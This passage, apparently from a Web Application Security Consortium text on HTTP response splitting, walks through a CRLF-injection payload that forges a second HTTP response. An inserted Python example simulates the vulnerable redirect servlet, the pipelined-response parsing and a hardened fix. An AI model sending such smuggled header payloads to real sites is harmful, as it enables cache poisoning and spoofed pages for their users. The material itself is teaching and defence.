Superfluous data: everything beyond the end of the second response is superfluous, and does not conform to the HTTP standard.
So when the attacker feeds the target with two requests, the first being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
And the second to the URL
/index.html
The target would believe that the first request is matched to the first
response:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0
And that the second request (to /index.html) is matched to the second
response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
And by this, the attacker manages to fool the target.
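The exchange above, worked through in code as an added example that is not part of the WASC text or of any real redir_lang.jsp: a Python stand-in for the vulnerable servlet, a minimal pipelined-response parser of the kind a proxy or browser applies to the byte stream (status line, headers, then exactly Content-Length body bytes), and a hardened variant of the servlet. The host 10.1.1.1, the Date header and the payload are taken from the text; the servlet's trailing headers after Location (Content-Type and Content-Length: 0), the function names and the 400 response for rejected input are assumptions.

```python
import re
import urllib.parse
from typing import Dict, List, Tuple

# Constructed payload: the attacker's first request parameter, URL-encoded
# exactly as in the text. DECODED_LANG is what the servlet sees after decoding.
PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a<html>Shazam</html>"
)
DECODED_LANG = urllib.parse.unquote(PAYLOAD)

Response = Tuple[str, Dict[str, str], bytes]


def build_redirect(location_value: str) -> bytes:
    """Emit a 302 whose Location header embeds location_value verbatim.

    Assumed server behaviour (not from the text): the redirect carries
    Content-Type and Content-Length: 0 after Location. Once the stream is
    split, those trailing headers are the 'superfluous data'.
    """
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Date: Wed, 24 Dec 2003 15:26:41 GMT\r\n"
        f"Location: http://10.1.1.1/by_lang.jsp?lang={location_value}\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def vulnerable_redirect(lang: str) -> bytes:
    """redir_lang.jsp as the text describes it: the already-decoded parameter
    is copied into Location, so an embedded CR LF pair splits the response."""
    return build_redirect(lang)


def hardened_redirect(lang: str) -> bytes:
    """Fix: refuse control characters outright, and percent-encode the value
    before it reaches a header so a CR LF pair can only arrive as %0D%0A."""
    if re.search(r"[\x00-\x1f\x7f]", lang):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return build_redirect(urllib.parse.quote(lang, safe=""))


def split_responses(stream: bytes) -> Tuple[List[Response], bytes]:
    """Parse consecutive responses the way a pipelining client or proxy does.

    Returns the well-formed responses found and whatever trailing bytes did
    not begin a further status line (the superfluous data).
    """
    responses: List[Response] = []
    pos = 0
    while stream.startswith(b"HTTP/", pos):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end < 0:                      # incomplete head: stop parsing
            break
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        body_len = int(headers.get("content-length", "0"))
        body = stream[body_start:body_start + body_len]
        responses.append((lines[0], headers, body))
        pos = body_start + body_len           # next response starts right after the body
    return responses, stream[pos:]


def match_pipelined(requests: List[str], stream: bytes) -> List[Tuple[str, str]]:
    """Pair the i-th request with the i-th parsed response: this ordering rule
    is why the target believes /index.html was answered with 'Shazam'."""
    responses, _ = split_responses(stream)
    return [(req, status) for req, (status, _, _) in zip(requests, responses)]


if __name__ == "__main__":
    stream = vulnerable_redirect(DECODED_LANG)
    requests = ["/redir_lang.jsp?lang=" + PAYLOAD, "/index.html"]
    for req, status in match_pipelined(requests, stream):
        print(f"{req[:40]:<40} -> {status}")
    responses, extra = split_responses(stream)
    print("second body:", responses[1][2], "| superfluous:", extra)
    print("hardened:", split_responses(hardened_redirect(DECODED_LANG))[0][0][0])
```

The parser here is deliberately strict (it stops at the first byte sequence that is not a status line); real proxies and browsers differ in how they treat leading CRLF, missing Content-Length and the leftover bytes, which is exactly where the simplified picture above breaks down.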
Now, this particular example is quite naive, as is explained in [1]. It
doesn't take into account some problems with how targets parse the
TCP stream, issues with the superfluous data, problems with the data
Copyright 2004, Web Application Security Consortium. All rights reserved.